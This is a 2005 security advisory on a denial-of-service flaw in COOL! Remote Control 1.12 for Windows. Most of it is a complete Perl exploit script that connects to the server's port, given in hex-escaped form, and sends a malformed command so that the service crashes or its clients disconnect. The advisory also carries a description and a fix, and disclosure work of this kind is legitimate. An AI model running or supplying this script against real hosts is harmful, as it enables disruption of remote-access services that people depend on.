Update:
10:18 10/09/2005
Subject:
"COOL! Command Execution Denial Of Service"
Version:
COOL! Remote Control 1.12
Operating System:
- All Windows
Typical software:
- Shareware
Severity Flaw:
- Low
Description:
COOL! Remote Control is an excellent remote computing system that is very easy to use. It can display remote a PC screen
on your own PC IN REAL TIME and allow you to use a mouse or keyboard work on it.
It means that you can work on an office PC from your own PC as if you were sitting in front of it! Also, you can transfer
files from or to a remote PC, and shutdown, reboot,logoff or let it sleep
Vulnerability:
A denial of service condition has been disclosed in the COOL! Remote Control (server) component that could allow a
remote attacker to crash the service by sending a malicious TCP packet on specified port.
This could make server application as terminal crashed or need to closed.
Exploit:
#!usr/bin/perl
#
# COOL! Command Execution DOS Exploit
# --------------------------------------------
# Infam0us Gr0up - Securiti Research
#
# Info: infamous.2hell.com
# Vendor URL: www.yaosoft.com
#
# * If Remote Control(Client application) is running then already connected to server,
# this command exploit will made Remote Control as Client disconnected from server machine.
# But if the Remote Control is not currently connected to Remote Server,then
# by send specified command to Remote Server its allow the server crashed/closed
#
$ARGC=@ARGV;
if ($ARGC !=1) {
print "Usage: $0 [host]\n";
print "Exam: $0 127.0.0.1\n";
print "\n";
exit;
}
use Socket;
my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$popy = "\x31\x31\x39\x38\x30";
print "\n[+] Connect to host..\n";
$iaddr = inet_aton($remote) or die "[-] Error: $!";
$paddr = sockaddr_in($popy, $iaddr) or die "[-] Error: $!";
$proto = getprotobyname('tcp') or die "[-] Error: $!";
socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "[-] Error: $!";
connect(SOCK, $paddr) or die "[-] Error: $!";
print "[+] Connected\n";
print "[+] Send invalid command..\n";
$empty =
"\x49\x4e\x46\x41\x4d\x4f\x55\x531".
"\x47\x52\x4f\x55\x50";
send(SOCK, $empty, 0) or die "[-] Cannot send query: $!";
sleep(2);
print "[+] DONE\n";
print "[+] Check if server crash!\n";
close(SOCK);
exit;
Solution:
Upgrade to the latest version.
Vendor URL:
Mail - support@yaosoft.com
WWW - http://www.yaosoft.com/
Published:
basher13 (Infam0us Gr0up - Securiti Research)
basher13@linuxmail.org / infamous.2hell.com